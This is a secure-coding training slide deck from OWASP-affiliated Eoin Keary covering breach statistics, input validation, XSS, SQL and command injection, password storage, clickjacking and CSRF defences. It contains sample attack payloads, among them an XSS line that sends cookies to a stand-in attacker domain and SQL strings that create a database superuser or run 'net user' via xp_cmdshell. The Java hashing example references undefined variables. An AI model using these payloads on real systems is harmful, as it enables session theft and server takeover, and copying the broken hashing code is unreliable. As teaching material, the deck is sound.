Embed Size (px)
Citation preview
Approaching Secure CodeWhere Do I Start?
Eoin Keary
CTO/Founder edgescan.com OWASP Leader/Member/Ireland Founder
(ex)OWASP Global Board Member
2016 – in review
• 83,000 impacted by breach at Gyft Inc• 63,000 records exposed at UCF (Florida)• 15,000 credit cards Bailey's Inc.• Hyatt data beach 250 hotels in 50 countries• Neiman Marcus – 5,200 accounts• TaxSlayer – 8,800 customers• Yahoo – 500,000,000 accounts Globally, every second, 18
adults become victims of cybercrime- Symantec
“The loss of industrial information and intellectual property through cyber espionage constitutes the greatest transfer of wealth in history” - Keith Alexander
“One hundred BILLION dollars” - Dr Evil
Eoin, I didn’t click it – My Mum
Two weeks of ethical hacking
Ten man-years of development
Business Logic Flaws
Code FlawsSecurity Errors
An inconvenient truth
Agile Risk Model
Fail Early – Fail Often“Push Left”
Make this more difficult: Lets change the application code once a month.
Continuous Testing:
Web ApplicationsApp Server
SSL/TLSDatabasesServices
Operating SystemsNetworks
Full Stack Security
Make this more difficult: Lets change the application code once a month.
Secure Development…
Requirementsand use cases
Design Test plans Code Testresults
Fieldfeedback
Securityrequirements
Riskanalysis
Risk-basedsecurity tests
Staticanalysis(tools)
Penetrationtesting
Design Review
Iterative approach
Code Review
Risk = Threat x Vulnerability
What do we need to test,
And how Code review tools
GPDR EU directive:
The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a Regulation by which the European Commission intends to strengthen and unify data protection for individuals within the European Union (EU).
• a fine up to 20,000,000 EUR or up to 4% of the annual worldwide turnover of the preceding financial year in case of an enterprise, whichever is greater (Article 83, Paragraph 5 & 6[16])
Box ticking
So….• What are we protecting against?• Which security bugs do we spend time
fixing first?• Continuous security• Start early (design securely)
Lets Dig a Little Deeper……..
Some Stats
Based on 1000’s of continuous assessments using edgescan.com
Both Host, WebServer and Web application assessed.
Vulnerability Breakdown
Critical1%
High14%
Medium17%
Low24%
Minimal44%
Risk Density
15% of Assets had a high or critical risk vulnerability
Most Common Vulnerability
Browser Attacks
61%Cryptog-raphy17%
Session Management
9%
Injection Attacks
4%
Authori-sation
4%
Information Leakage
3%
Insecure Deployment
1% Availability1%
Application Layer
XSS91%
CSRF5%
Open Redirect-ion1%
HTML Injection1%
Response Splitting
1%DOM Vulner-
abilities1%
Browser Attacks - 61%
Risk Dispersion
Application95%
Network5%
Application82%
Network18%
Critical Risk High Risk
Oldest Critical Vulnerabilities
Oldest “Known” vulnerability discovered in 2016 by edgescan;CVE-2007-6420 - Cross-site request forgery (CSRF) CVE-2007-3847 - Apache 2.3.0 DoSCVE-2007-5000 - Apache HTTP Server XSSCVE-2007-6388 - Apache HTTP Server XSS
9 year old vulnerabilities exist in the wild on live servers. Poor/Non existent patching is the major root cause.
Good News is the frequency of occurrence is between 1.5% and 3%
What else happened in 2007?First iPhone was launched…
GET vs POST HTTP Request
GET /search.jsp?name=blah&type=1 HTTP/1.0User-Agent: Mozilla/4.0 Host: www.mywebsite.comReferrer: www.jimslamps.com/login?user=jim&pass=w0rDupCookie: SESSIONID=2KDSU72H9GSA289<CRLF>
GET request POST request
POST /search.jsp HTTP/1.0User-Agent: Mozilla/4.0 Host: www.mywebsite.comContent-Length: 16Cookie: SESSIONID=2KDSU72H9GSA289<CRLF>name=blah&type=1<CRLF>
GET requestGET /search.jsp?name=blah&type=1 HTTP/1.0User-Agent: Mozilla/4.0
Host: www.mywebsite.com
Cookie: SESSIONID=2KDSU72H9GSA289
<CRLF>
POST requestPOST /search.jsp HTTP/1.0User-Agent: Mozilla/4.0
Host: www.mywebsite.com
Content-Length: 16
Cookie: SESSIONID=2KDSU72H9GSA289
<CRLF>
name=blah&type=1
<CRLF>
GET requests:
Can be bookmarkedLogged in serverBrowser HistoryCachedEasier to attack*
POST requests:
Data in HTTP bodyNot logged on server
What are HTTP Headers?
HTTP headers are components of the message header of HTTP Requests and Responses HTTP headers define different aspects of an HTTP transaction HTTP headers are colon-separated name-value pairs in clear-text string format, terminated by a carriage return (CR) and line feed (LF) character sequence.
http://en.wikipedia.org/wiki/List_of_HTTP_header_fields
HTTP Request Headers, Examples
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==Accept: text/plainContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Security HTTP Response Headers
Data Validation
21
Input that is not directly entered by the user is typically less prone to validation
Attacks discussed in this section apply to external input from any client-side source Standard form input control Read-only HTML form controls (drop down lists, radio
buttons,hidden fields, etc)
HTTP Cookie Values HTTP Headers Embedded URL parameters (e.g., in the GET request)
Data Validation
22
Known Bad
Known Good
ExactMatch
Data Validation is typically done using one of three basic approaches
All input must be properly validated on the server (not the client) to ensure that malicious data is not accepted and processed by the application
Data is validated against a list of explicit known values
Application footprint or “application attack surface” defined
Provides the strongest level of protection against malicious dataOften not feasible when a large number of possible good values are expected
May require code modification any time input values are changed or updated
Exact Match Validation
23
Example: Acceptable input is yes or noif ($input eq“yes” or $input eq “no”)
Exact Match Validation Example
24
Validates the variable gender against 2 known values (Java)
static boolean validateGender (String gender) {
if (gender.equals (“Female“))return true;
else if (gender.equals (“Male“))return true;
elsereturn false;
}
Known Good Validation
25
Often called “white list” validation
Data is validated against a list of allowable characters
Typically implemented using regular expressions to match known good data patternsData type cast/convert functions can be used to verify data conforms to a certain data type (i.e. Int32)Expected input character values must be clearly defined for each input variable
Care must be taken if complex regular expressions are used
A common mistake is to forget to anchor the expression with ^ and $
Regular Expressions
28
Regular Expressions is a term used to refer to a pattern-matching technology for processing text
Although there is no standards body governing the regular expression language, Perl 5, by virtue of its popularity, has set the standard for regular expression syntaxA Regular Expression itself is a string that represents a pattern, encoded using the regular expression language and syntax
Data Validation Techniques
29
Validates against a regular expression representing the proper expected data format (10 alphanumeric characters) (.NET)using System.Text.RegularExpressions;static bool validateUserFormat(String userName) {
bool isValid = false; //Fail by default // Verify that the UserName is 1-10 character alphanumericisValid = Regex.IsMatch(userName, @"^[A-Za-z0-9]{10}$");return isValid;
}
Regular Expression - Zend
$validator = new Zend_Validate_Regex(array('pattern' => '/^Test/');$validator->isValid("Test"); // returns true$validator->isValid("Testing"); // returns true$validator->isValid("Pest"); // returns false
Often called “BlackList” validation
Data is validated against a list of characters that are deemed to be dangerous or unacceptable
Useful for preventing specific characters from being accepted by the applicationProvides the weakest method of validation against malicious dataSusceptible to bypass using various forms of character encoding
Known Bad Validation
32
Example: Validating entry into generic text fieldif ($input !~/[\r\t\n><();\\+&%’”*\|]/)
Known Bad Validation Example
33
Validates against a regular expression of known bad input strings (.Net)using System.Text.RegularExpressions;static boolean checkMessage(string messageText){
bool isValid = false; //Fail by default // Verify input doesn’t contain any < , >isValid = !Regex.IsMatch(messageText, @"[><]");return isValid;
}
Bounds Checking
34
All external input must also be properly validated to ensure that excessively large input is rejected Length checking: A maximum length check should be
performed on all incoming application dataInput that exceeds the appropriate length or size limits must be rejected and not processed by the application Size checking: A maximum size check should be performed
on all incoming data files
The following code reads a String from a file.Because it uses the readLine() method, it will read an unbounded amount of input until a <newline> (\n) charter is read.
InputStream Input = inputfileFile.getInputStream(Entry); Reader inpReader = new InputStreamReader(Input); BufferedReader br = new BufferedReader(inpReader); String line = br.readLine();
This could be taken advantage of and cause an OutOfMemoryException or to consume a large amount of memory which shall affect performance and initiate costly garbage collection routines.
Bounds Checking – Example
35
Unbounded Reading of a file
Bounds checking
$validator = new Zend_Validate_StringLength(array('max' => 6));$validator->isValid("Test"); // returns true$validator->isValid("Testing"); // returns false
Bounds checking – File size
$upload = new Zend_File_Transfer();
// Limit the size of all files to be uploaded to 40000 bytes$upload->addValidator('FilesSize', false, 40000);
// Limit the size of all files to be uploaded to maximum 4MB and mimimum 10kB$upload->addValidator('FilesSize', false, array('min' => '10kB', 'max' => '4MB'));
PS
Oh, yes…..Validation needs to be performed on the server side.
Validation is also important on the client side and so is output encoding…..More later.
Cross Site Scripting
JavaScript Injection
<
<
EncodingOutput
Characters Decimal Hexadecimal HTML Entity Unicode
" (double quotation marks)
" " " \u0022
' (single quotation mark)
' ' ' \u0027
& (ampersand) & & & \u0026
< (less than) < < < \u003c> (greater than) > > > \u003e
Safe ways to represent dangerous characters in a web page
XSS AttackPayloads – Session Hijacking
– Site Defacement– Network Scanning– Undermining CSRF Defenses– Site Redirection/Phishing– Load of Remotely Hosted Scripts– Data Theft– Keystroke Logging– Attackers using XSS more frequently
<script>window.location=‘https://evileoin.com/unc/data=‘ + document.cookie;</script>
<script>document.body.innerHTML=‘<blink>EOIN IS COOL</blink>’;</script>
Anatomy of a XSS Attack (bad stuff)
<html><body><? phpprint "Not found: " .urldecode($_SERVER["REQUEST_URI"]);?></body></html>
Request: http://testsite.test/file_which_not_exist
Response: Not found: /file_which_not_exist
Response: Not found: / (but with JavaScript code <script>alert("TEST");</script>)
Request: http://testsite.test/<script>alert("TEST");</script>
Anatomy of a XSS Attack (bad stuff)
XSS Defense by Data Type and Context
Data Type Context DefenseString HTML Body HTML Entity EncodeString HTML Attribute Minimal Attribute EncodingString GET Parameter URL EncodingString Untrusted URL URL Validation, avoid
javascript: URLs, Attribute encoding, safe URL verification
String CSS Strict structural validation, CSS Hex encoding, good design
HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer)
Any DOM DOM XSS Cheat SheetUntrusted JavaScript Any Sandboxing (Google Caja)JSON Client Parse Time JSON.parse() or json2.js
Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
HTML Encoding:Certain sets of characters mean something special in HTML. For instance ‘<’ is used to open and HTML tag and ‘&’ is used to and the beginning of a sequence of characters to define special symbols like the copy write symbol. (htmlentities in PHP)
HttpUtility.HtmlEncode(“<script>alert(‘&’);</script>”)
<script>alert('&');</script>
Attribute Encoding:Attribute encoding replaces three characters that are not valid to use inside attribute values in HTML. Those characters are ampersand ‘&’, less-than ‘<’, and quotation marks ‘”’
HttpUtility.HtmlAttributeEncode(“<script>alert(\”&\”);</script>”)
<script>alert("&");</script>
URL EncodingURL encoding used when you have some data that you would like to pass in the URL and that data contains some reserved or invalid characters (&/<space>) – (urlencode() in php)
HttpUtility.UrlEncode(“Some Special Information / That needs to be in the URL”)
Some+Special+Information+%2f+That+needs+to+be+in+the+URLORSome%20Special%20Information%20%2f%20That%20needs%20to%20be
%20in%20t he%20URL
Where can it go wrong?
HTML Body Context
<span>UNTRUSTED DATA</span>
attack <script>/* bad stuff */</script>
HTML Attribute Context
<input type="text" name="fname" value="UNTRUSTED DATA">
attack: "><script>/* bad stuff */</script>
HTTP GET Parameter Context
<a href="/site/search?value=UNTRUSTED
DATA">clickme</a> attack: " onclick="/* bad stuff */"
URL Context
<a href="UNTRUSTED URL">clickme</a>
<iframe src="UNTRUSTED URL" />
attack: javascript:/* BAD STUFF */
CSS Value Context
<div style="width: UNTRUSTED DATA;">Selection</div>
attack: expression(/* BAD STUFF */)
JavaScript Variable Context
<script>var currentValue='UNTRUSTED DATA';</script>
<script>someFunction('UNTRUSTED DATA'); </script>
attack: ');/* BAD STUFF */
JSON Parsing Context
JSON.parse(UNTRUSTED JSON DATA)
Solving Real World XSS Problems in Java with OWASP Libraries
The ProblemWeb Page built in Java JSP is vulnerable to XSS
The Solution<input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />
<textarea name="text"><%= Encode.forHtmlContent(textValue) %>" />
<button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button>
<script type="text/javascript”>var msg = "<%= Encode.forJavaScriptBlock(message) %>”;alert(msg);</script>
OWASP Java Encoder Projecthttps://www.owasp.org/index.php/OWASP_Java_Encoder_Project
OWASP HTML Sanitizer Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
Solving Real World Problems with the OWASP HTML Sanitizer Project
The ProblemWeb Page is vulnerable to XSS because of untrusted HTML
The SolutionPolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build();String safeHTML = policy.sanitize(untrustedHTML);
OWASP JSON Sanitizer Projecthttps://www.owasp.org/index.php/OWASP_JSON_Sanitizer
• Given JSON-like content, converts it to valid JSON.• This can be attached at either end of a data-
pipeline to help satisfy Postel's principle: Be conservative in what you do, be liberal in what you accept from others.
• Applied to JSON-like content from others, it will produce well-formed JSON that should satisfy any parser you use.
• Applied to your output before you send, it will coerce minor mistakes in encoding and make it easier to embed your JSON in HTML and XML.
Solving Real World Problems with the OWASP JSON Sanitizer Project
The ProblemWeb Page is vulnerable to XSS because of parsing of untrusted JSON incorrectly
The SolutionJSON Sanitizer can help with two use cases.
1) Sanitizing untrusted JSON on the server that is submitted from the browser in standard AJAX communication
2) Sanitizing potentially untrusted JSON server-side before sending it to the browser. The output is a valid Javascript expression, so can be parsed by Javascript's eval or by JSON.parse.
SAFE use of JQuery $(‘#element’).text(UNTRUSTED DATA);
UNSAFE use of JQuery $(‘#element’).html(UNTRUSTED DATA);
jQuery methods that directly update DOM or can execute JavaScript
$() or jQuery() .attr().add() .css().after() .html().animate() .insertAfter().append() .insertBefore().appendTo()
Dangerous jQuery 1.7.2 Data TypesCSS Some Attribute SettingsHTML URL (Potential Redirect)
jQuery methods that accept URLs to potentially unsafe content
jQuery.ajax() jQuery.post()jQuery.get() load()jQuery.getScript()
InjectionFlaws
';
Select * from user where username='uid' and password = 'password‘
uid = “EoinKeary”password = “Password123!”
Select * from user where username=‘EoinKeary ' and password = ‘Password123!’
uid = “EoinKeary”Password = “’ OR 1=1;--”
Select * from user where username ='EoinKeary' and password = ‘’ OR 1=1;--’
Anatomy of a SQL Injection Attack
public void bad(HttpServletRequest request, HttpServletResponse response) throws Throwable {
String data;
Logger log_bad = Logger.getLogger("local-logger");
/* read parameter from request */ data = request.getParameter("name");
Logger log2 = Logger.getLogger("local-logger");
Connection conn_tmp2 = null;Statement sqlstatement = null;ResultSet sqlrs = null;
try {conn_tmp2 = IO.getDBConnection();sqlstatement = conn_tmp2.createStatement();
/* take user input and place into dynamic sql query */sqlrs = sqlstatement.executeQuery("select * from users where name='"+data+"'");
IO.writeString(sqlrs.toString());}catch(SQLException se)
{
Exploit is executed (Sink)
Input from request (Source)
Anatomy of a SQL Injection Attack
String Building toCall Stored Procedures
String building can be done when calling stored procedures as wellsql = “GetCustInfo @LastName=“ +request.getParameter(“LastName”);
Stored Procedure CodeCREATE PROCEDURE GetCustInfo (@LastName VARCHAR(100)) ASexec(‘SELECT * FROM CUSTOMER WHERE LNAME=‘’’ + @LastName + ‘’’’)GO (Wrapped Dynamic SQL)
What’s the issue here………… If blah’ OR ‘1’=‘1 is passed in as the LastName value, the entire
table will be returned Remember Stored procedures need to be implemented safely.
'Implemented safely' means the stored procedure does not include any unsafe dynamic SQL generation.
Anatomy of a SQL Injection Attack
SQL Injection Attack Techniques
Boolean based blind SQL injection
par=1 AND ORD(MID((SQL query),
Nth char, 1)) > Bisection num—
UNION query (inband) SQL injection
par=1 UNION ALL SELECT query—
Batched queries SQL injection
par=1; SQL query;--
Commands to access Oracle Databases.
Many applications run an “admin” account when using the database.
With SQL injection we can access the DB as an admin user.
Total Control…
Query Parameterization (PHP)
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email);$stmt->bindParam(':user_id', $id);
Query Parameterization (.NET)SqlConnection objConnection = new SqlConnection(_ConnectionString);objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text);SqlDataReader objReader = objCommand.ExecuteReader();
Query Parameterization (Java)
String newName = request.getParameter("newName") ;String id = request.getParameter("id");
//SQLPreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQLQuery safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
Query Parameterization(Cold Fusion)
<cfquery name="getFirst" dataSource="cfsnippets">
SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER"> </cfquery>
Query Parameterization (PERL)
my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )";my $sth = $dbh->prepare( $sql ); $sth->execute( $bar, $baz );
Automatic Query Parameterization (.NET linq4sql)
public bool login(string loginId, string shrPass) { DataClassesDataContext db = new DataClassesDataContext();
var validUsers = from user in db.USER_PROFILE where user.LOGIN_ID == loginId
&& user.PASSWORDH == shrPass select user;
if (validUsers.Count() > 0) return true; return false; };
Code Review - Find the Vulns!
<?php
$offset = $argv[0]; $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";$result = pg_query($conn, $query);
?>$offset is intended to be an Integer passed via a HTTP request.
How about this?
0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; --
Code Review - Find the Vulns!
<?php$prod = $_GET[“prod"]; $query = "SELECT * FROM products WHERE id LIKE '%$prod%'";$result = mssql_query($query);
?>
Developer intends a product from a listbox control: E.g. TV, Radio, Bannana, Nail
Attacker:Circumvents Listbox control and injects:
a%' exec master..xp_cmdshell 'net user test testpass /ADD‘ --
Resulting in :"SELECT * FROM products WHERE id LIKE '%a%'exec master..xp_cmdshell 'net user test testpass /ADD' --%'";
Command InjectionWeb applications may use input parameters as arguments for OS scripts or executablesAlmost every application platform provides a mechanism to execute local operating system commands from application code
Most operating systems support multiple commands to be executed from the same command line. Multiple commands are typically separated with the pipe “|” or ampersand “&” characters
Perl: system(), exec(), backquotes(``) C/C++: system(), popen(),
backquotes(``) ASP: wscript.shell Java: getRuntime.exec MS-SQL Server: master..xp_cmdshell PHP : include() require(), eval() ,shell_exec
8383
LDAP Injection https://www.owasp.org/index.php/LDAP_injection https://www.owasp.org/index.php/
Testing_for_LDAP_Injection_(OWASP-DV-006)SQL Injection
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Query_Parameterization?_Cheat_SheetCommand Injection
https://www.owasp.org/index.php/Command_Injection
Where can I learn more?
Secure Password Storage
• Verify Only• Add Entropy• Slow Down
md5("password") = 5f4dcc3b5aa765d61d8327deb882cf99Sha1(“Password”)= 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
md5 and SHA1 are old and should not be used anymore.
Sha256(“password”)= 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
Sha256 = Stronger but still weak and easily broken using Rainbow Tables
Hashing
Top Passwords!
Salting
A salt is a random unique token stored with each password.
Let's say the salt is 5aP3v*4!1bN<x4i&3 and the hash is 9537340ced96de413e8534b542f38089c65edff3.
Now your database of passwords is useless, because nobody has rainbow tables that include that hash
Hash = h(password + salt)
It's computationally infeasible to generate rainbow tables for every possible salt.
So now we've forced the bad guys to start cracking the hashes again.
In this case, it'd be pretty easy to crack since I used a bad password, but it's still better than him being able to look it up in a tenth of a second!
We need to add entrophy - Salting
Secure Password Storage, Java Example
public String hash(String password, String userSalt, int iterations) throws EncryptionException {
byte[] bytes = null;try { MessageDigest digest = MessageDigest.getInstance(hashAlgorithm); digest.reset(); digest.update(ESAPI.securityConfiguration().getMasterSalt()); digest.update(userSalt.getBytes(encoding)); digest.update(password.getBytes(encoding));
// rehash a number of times to help strengthen weak passwords bytes = digest.digest(); for (int i = 0; i < iterations; i++) { digest.reset(); bytes = digest.digest(salts + bytes + hash(i)); } String encoded = ESAPI.encoder().encodeForBase64(bytes,false); return encoded;} catch (Exception ex) { throw new EncryptionException("Internal error", "Error");}}
Standardized Algorithms for Password Storage
B/S Crypt
- Adaptive Hash- Very Slow (work factor)- Blowfish Derived- Single Use Salt
Why scrypt over bcrypt?
- Much more secure than bcrypt- Designed to defend against large scale hardware
attacks- There is a scrypt library for most major scripting
languages (Python, Ruby etc)- CAUTION: New algorithm (2009)- CAUTION: Scalability Problems
Forgot Password Secure Design
– Require identity and security questions • Last name, account number, email, DOB• Enforce lockout policy• Ask one or more good security questions
– Send the user a randomly generated token via out-of-band method• email, SMS or token
– Verify code in same Web session• Enforce lockout policy
– Change password• Enforce password policy
Multi Factor Authentication
• Passwords as a single authentication credential are DEAD even for consumer services.
• Mobile devices as a “what you have” factor• SMS and Native Mobile Apps for MFA» not perfect but heavily reduce risk vs. passwords only
• Password strength and password policy less important
• You protect your magic user and fireball wand with MFA• Protect your multi-billion dollar enterprise with MFA
MFA FTW
Clickjacking
First, make a tempting site
<iframe src="http://mail.google.com">
iframe is invisible, but still clickable!
<style>iframe { width:300px; height:100px; position:absolute; top:0; left:0; filter:alpha(opacity=00); opacity:0.0;}</style>
<iframe src="https://mail.google.com”>
X-Frame-OptionsHTTP Response Header
// to prevent all framing of this content response.addHeader( "X-FRAME-OPTIONS", "DENY" );
// to allow framing of this content only by this site response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" );
// to allow framing from a specific domainresponse.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
Encryption in Transit HTTPS/TLS• Sensitive data must be encrypted in transit via
HTTPS/SSL• Starting when the login form is rendered• Until logout is complete• Confidentiality, Integrity and Authenticity
• OWASP HTTPS best practices://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• HSTS (Strict Transport Security) can help here
• Certificate Pinning can help here
Cross Site Request Forgery (CSRF)
Where are we going?
Dangerous Cookie Behavior
Attacking Sensitive TransactionsReal World Cross Site Request ForgerySynchronizer Token Pattern
XSS Defense Criticality
Re-Authentication
<html><body><img src="https://mail.google.com/deleteAllMsgs?confirm=true" height=1 width=1/></body></html>
What will the browser submit?
Attacking Sensitive Transactions
Cross-Site Request Forgery (XSRF/CSRF) Attacks the trust a web application has for authenticated
users Browser instances share cookies Users typically browse multiple sites simultaneously Attackers can abuse the shared cookie jar to send requests
as the authenticated user
Once authenticated, users are trusted throughout the lifetime of their sessionApplications do not require users to re-authenticate when executing sensitive transactions
Anatomy of an CSRF Attack
This form will generate requests that resemble the followingGET http://www.example.com/Transfer.asp?acct=##&amount=##
Consider a consumer banking application that contains thefollowing form
<form action=“http://site.com/Transfer.asp” method=“POST” id=“form1”> <p>Account Num: <input type=“text” name=“acct” value=“2345”/></p> <p>Transfer Amt: <input type=“text” name=“amount” value=“10000”/></p> </form> <script>document.getElementById(“form1”).submit();</script>
Cross-Site Request Forgery
What is the Result?
When the <img> tag loads, the attacker’s web site will send a request to the consumer banking applicationThe user’s browser will attach the appropriate cookie to the attacker’s forged request, thus “authenticating” itThe banking application will verify that the cookie is valid and process the requestThe attacker cannot see the resultant response from the forged request Does that matter?
Real World CSRF Attacks
Real-World CSRF attack hijacks DNS Server configuration of TP-Link routersDNS altered to malicious server.All request from router being re-routed to malicious sites. - 2014
PayPal Profile HackingAlter arbitrary peoples Paypal Profile via CSRF – 2016
135 Million ARRIS (Motorola) SURFboard modemUnauthenticated reboot flaw via CSRF - 2016
Modem CSRF example
CSRF within the Internal Network
CSRF allows external attackers to launchattacks against internal applications! – Runs in Users Browser.
External web sites can trick your browser into making requests on the internal network
Even easier against single-sign onEffectively you are always logged into internal applications
All internal applications must be protected against CSRF
CSRF Defenses
Request that cause side effects should use the POST method Alone, this is not sufficient
Validation of HTTP REFERER header (not recommended) Tracking valid refererring pages may be problematic Easy to spoof (but getting more difficult)
Require users to re-authenticate
Cryptographic Tokens
Synchronizer Token Pattern
“Hidden” token in HTML
Value defined by server when page is rendered. Value is stored in session. Consider leveraging the java.security.SecureRandom class for Java applications.
Upon Submit, token is sent with form.
Token value must match with value in session.
Attacker would not have token value. (XSS attack could get token is page was vulnerable to XSS)
<form action="/transfer.do" method="post"> <input type="hidden" name="CSRFToken" value="OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTVi MGYwMGEwOA=="> … </form>See alsohttps://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project https://www.owasp.org/index.php/PHP_CSRF_Guard https://www.owasp.org/index.php/.Net_CSRF_Guard
Challenge-Response
Challenge-Response is another defense option for CSRF
The following are some examples of challenge-response options. CAPTCHA Re-Authentication (password) One-time TokenWhile challenge-response is a very strong defense to CSRF (assuming proper implementation), it does impact user experience. For applications in need of high security, tokens (transparent) and challenge-response should be used on high risk functions.
Other CSRF Defenses
Require users to re-authenticate
Amazon.com does this *really* well
Double-cookie submit defense
Decent defense, but not based on randomness; based on SOP
Summary
Dangerous Cookie Behavior
Attacking Sensitive TransactionsReal World Cross Site Request ForgerySynchronizer Token Pattern
XSS Defense Criticality
Re-Authentication
